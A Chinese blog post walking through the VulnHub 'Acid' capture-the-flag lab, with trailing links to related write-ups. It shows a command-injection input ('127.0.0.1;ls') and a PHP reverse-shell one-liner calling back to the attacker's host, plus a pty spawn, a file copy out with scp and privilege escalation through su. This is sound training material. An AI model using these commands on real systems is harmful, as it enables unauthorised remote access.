vulnhub-ACID

最新推荐文章于 2024-06-07 10:05:34 发布
最新推荐文章于 2024-06-07 10:05:34 发布
阅读量2.2k 收藏
点赞数
文章标签: 安全 linux 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50683638/article/details/121810255
版权
靶机:acid(https://download.vulnhub.com/acid/Acid.rar)网络模式:nat
扫描主机

在这里插入图片描述

扫描端口33447/tcp,Apache2.4.10

在这里插入图片描述
在这里插入图片描述

目录扫描

在这里插入图片描述
在这里插入图片描述

浏览网站,查看源码底下看到一串十六进制编码
先ascii转换,在base64转码得到 wow.jpg

在这里插入图片描述
在这里插入图片描述

访问wow.jpg报错404想到上面我们扫描目录images

在这里插入图片描述

将图片保存,记事本打开,发现一串数字

在这里插入图片描述

先ascii转码,在MD5转换得到63425

在这里插入图片描述
在这里插入图片描述

但暂时并没有什么账号或者需要登陆的地方,我们用dirbuster扫描(kali自带)

在这里插入图片描述
在这里插入图片描述

依次访问cake.php,一个登陆界面,且标题变成magic_box

在这里插入图片描述

hacked.php

在这里插入图片描述

好像都没什么,我们访问下Magic_Box,说明有这个目录

在这里插入图片描述

继续扫描

在这里插入图片描述在这里插入图片描述

访问command.php,存在命令执行漏洞

在这里插入图片描述

输入127.0.0.1;ls看到一个tail.php

在这里插入图片描述

shell反弹
在command.php界面输入127.0.0.1然后抓包

在这里插入图片描述

然后发送到Decoder编码;php -r '$sock=fsockopen("192.168.6.129",6666);exec("/bin/sh -i <&3 >&3 2>&3");'

在这里插入图片描述

将编码后的内容输入在127.0.0.1后面然后发送到Repeater 点击send

在这里插入图片描述
在这里插入图片描述

kali监听

在这里插入图片描述

输入su命令报错,python调用python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

查看/etc/passwd

在这里插入图片描述

看到acid和saman

在这里插入图片描述

看到一个流量包

在这里插入图片描述

scp /sbin/raw_vs_isi/hint.pcapng root@192.168.6.129:/root/
但是不知道为什么开了ssh服务依旧报错,而且我密码一直错误

在这里插入图片描述

提权su saman密码其实就是command.php页面的1337hax0r

在这里插入图片描述

拿到root权限查看到flag

在这里插入图片描述

北极之北.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透靶场——Vulnhub:Acid
tlovejr的博客
09-17 293
1、首先还是常规套路,kali攻击机器还有靶机均为net模式,然后扫描主机 2、找到存活靶机ip地址,然后我们继续开始信息收集 nmap -T4 -p- 192.168.40.130 3、访问8080端口没有结果,那么我们继续访问一下33447这个端口试一下 4、成功发现我们要继续做的这个界面,继续信息收集,目录扫描,但是并没有发现有用的信息 5、然后我们继续尝试一下robots.txt 6、发现也没有什么有用的信息,那么我们查看一下源码,看看有没有什么有用的信息 7、在查看源码的时候发现有一个有
spark-acid:基于Hive ACID的Apache Spark的ACID数据源
03-14
适用于Apache Spark的Hive ACID数据源一个基于Spark Datasource V1 API的数据源,为提供Spark支持。 此数据源提供了与Hive ACID V2表,完全ACID表以及仅插入表一起使用的功能。 功能可用性矩阵功能性完整的ACID表仅...
Vulnhub靶机 Acid write up 命令执行反弹shell 分析pcapng包 得到登录密码 提权
YouthBelief的博客
12-05 546
Acid write up0x00 靶机搭建0x01 信息收集ip探测端口服务识别0x02 漏洞挖掘web思路步骤一:枚举目录,测试页面步骤二:保存图片到本地看看 0x00 靶机搭建 下载链接 https://download.vulnhub.com/acid/Acid.rar 靶机搭建 VM 启动 网卡设为nat 0x01 信息收集 ip探测 netdiscover -i eth0 -r 192.168.157.0/24 端口服务识别 masscan -p 1-65535 --ra
vulnhub靶机Acid渗透
xingjinhao123的博客
02-28 193
靶机介绍 官方下载地址:http://www.vulnhub.com/entry/acid-server,125/ 这个靶机的目标是获取root目录的的flag, 运行环境 靶机:网络连接方式设为NAT,IP地址:192.168.174.134 攻击机:同网段下的kali Linux系统,IP地址为:192.168.174.135 开始渗透 运行靶机 获取靶机IP地址 扫描端口及其服务 看到只开启了33447端口,是web服务 访问33447端口,在源代码中发现了0x643239334c6d7077
vulnhub靶场,-Acid
kukudeshuo的博客
08-02 398
vulnhub靶场,-Acid 环境准备 靶机下载地址:https://www.vulnhub.com/entry/acid-server,125/ 攻击机:kali(192.168.109.128) 靶机:-Acid(192.168.109.149) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.149 使用nmap扫描查看目标靶机端口开放情况
Vulnhubacid靶机渗透流程
weixin_44255856的博客
08-03 982
1,检查靶机主机是否存活。 2,检查靶机开放的端口并对端口进行识别 发现33447端口存活(存在web服务) 由于只存在web服务和apache服务,所以只能从web服务和apache服务下手。 3,首先直接御剑一把梭 大概看了下,先放在这里。 F12查看网页源码,发现存在注释。 0x643239334c6d70775a773d3d16进制转换为字符串d293LmpwZw==,最终解码出来...
VulnhubAcid实战
weixin_43862283的博客
04-29 352
1、发现主机 使用nmap对内网进行扫描,发现主机 nmap -sP 192.168.340/24 2、扫描端口 用nmap扫描目标主机,发现只有33447端口开启,http端口 nmap -sV -p0-65535 192.168.34.151 3、扫描网站目录并进行爆破 dirb http://192.168.34.151:33447 发现Challenge目录,进行目录爆破 访...
Vulnhub系列】Acid
大方子
11-28 1446
下载连接:https://download.vulnhub.com/acid/Acid.rar 靶机说明 Welcome to the world of Acid. Fairy tails uses secret keys to open the magical doors. 欢迎来到酸的世界。童话故事需要使用秘密钥匙打开魔法门。 目标 获得root权限和flag。 运行环境 ...
VulnHub靶场之Acid
A_dmin的博客
09-30 1030
VulnHub靶场之Acid 本来这个实验昨天就应该完成了的,但是在自己电脑上弄得时候直接卡死,,,,
VulnHub渗透测试实战靶场 - ACID: SERVER
LYJ20010728的博客
08-05 822
VulnHub渗透测试实战靶场 - ACID: SERVER环境下载ACID: SERVER靶机搭建渗透测试信息收集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 ACID: SERVER靶机搭建 将下载好的靶机环境,导入VMware,将其网络适配设置为NAT模式,运行即可 渗透测试 信息收集 使用Kali自带的工具netdiscover进行子网探测:sudo netdiscover -r 192.168.246.0/24 用Nmap对获取到的靶机IP地址进行扫描:sudo n
Net-class-hand-acid-acid:paddlehub ocr实践
05-08
Net-class-hand-acid-acid paddlehub ocr实践 网课手酸酸,眼花花,救星来啦! paddlehubocr实践 网课看完笔油见底,两手酸酸,头皮麻麻,本子满满密密麻麻。 你还在为网课抄不完的笔记烦恼嘛? 你还在为网课那弄不...
crackme-1-Acid_burn.zip
07-19
crackme-01
dl-malic acid
06-05
NANJINGXIANGSHENGTAI INDUSTRY dl-malic acid MSDS
CrackMe001-Acid burn
02-03
用于学习软件逆向和软件破解的Crack Me可执行文件,含破解后的文件。
VulnHub打靶の-Acid
壊壊的诱惑你的博客
10-12 1149
靶机地址:https://download.vulnhub.com/acid/Acid.rar 首先nmap -sP 或netdiscover -r来找靶机的IP,此为192.168.1.171 nmap -sV -p- 192.168.1.171扫描靶机的全部端口的服务版本: root@Kali-X86:~# nmap -sV -p- 192.168.1.171 Starting Nmap...
教你怎么用Vulnhub来搭建环境
热门推荐
大方子
09-22 2万+
0x01 前言 Vulnhub它是一个提供各种漏洞环境的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 如果只是练习一些常见的漏洞可以看我另外两篇用Docker来搭建各种漏洞靶场(妈妈再也不用担心我没有靶场练习了)从CentOS安装Docker来搭建漏洞靶场到Joomla 3.4.5 反序列化漏洞复现(附批量Getshell脚本) 0x02 下载 https:/...
安全生产月”专题报道:AI智能监控技术如何助力安全生产
TSINGSEE青犀视频官方技术博客
06-04 826
方案能够通过对人员行为的识别和分析,判断是否存在安全隐患。这些功能的实现,有助于企业提高安全管理水平,减少因人为因素导致的安全事故。
读书笔记-《软件定义安全》之二:SDN/NFV环境中的安全问题
wuxiaobing1234的博客
06-07 586
南向协议主要侧重于南向接口上的数据转发、网络配置、数据平面信息收集等功能。OpenFlow协议OpenFlow是SDN的标志性技术,他体现了SDN的核心思想:控制与转发分离。它通过流表控制技术支持用户对数据流行为进行控制。OpenFlow交换机根据流表来转发数据包,代表数据转发平面;控制器通过全网络视图来实现管控功能,其控制逻辑表示控制平面。OpenFlow协议的发展演进一直都围绕着两个方面,一方面是控制平面的增强,让系统功能更丰富、更灵活;
纷享销客安全体系:数据安全
最新发布
fxiaoke_com的博客
06-07 489
纷享销客CRM系统部署了综合性的防勒索软件系统,该系统融合了网络分区、访问控制以及备份解决方案等多重防护措施,旨在有效应对针对企业的勒索软件攻击,从而确保企业数据的安全性和业务的连续性。同时,公司积极响应数据主体的各种隐私权利要求,如访问权、更正权和删除权等,确保个人信息安全、机密,并防止任何未经授权的访问和滥用行为的发生。当租户发出请求时,系统要求携带经过高标准加密的身份信息,以便数据隔离算法能够精确识别不同租户的请求,并据此决定数据的存储与读取路径,从而满足租户间数据隔离的严格需求。
simulink中lead-acid模块
12-27
Lead-acid模块是Simulink中用于建模铅酸电池的工具。铅酸电池是一种常见的蓄电池,广泛应用于汽车、卡车以及太阳能储能系统等领域。 Simulink中的Lead-acid模块可以帮助用户建立铅酸电池的数学模型,用于模拟和分析电池的动态特性。通过该模块,用户可以设置电池的容量、内阻、电压响应等参数,并且可以模拟电池在不同工况下的充放电过程。用户还可以通过Lead-acid模块来分析电池的性能指标,例如电压、电流、温度、充电效率等。 在Simulink中使用Lead-acid模块可以帮助工程师更好地理解铅酸电池的工作原理,并且可以进行电池系统的设计和优化。例如,在设计汽车动力系统时,可以利用Lead-acid模块来分析电池在加速、制动等工况下的性能,进而选择合适的电池容量和配置。 总之,Simulink中的Lead-acid模块为用户提供了一个便捷而强大的工具,用于建立铅酸电池的动态模型,并能够帮助用户在电池系统的设计与优化过程中进行精确的仿真和分析。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值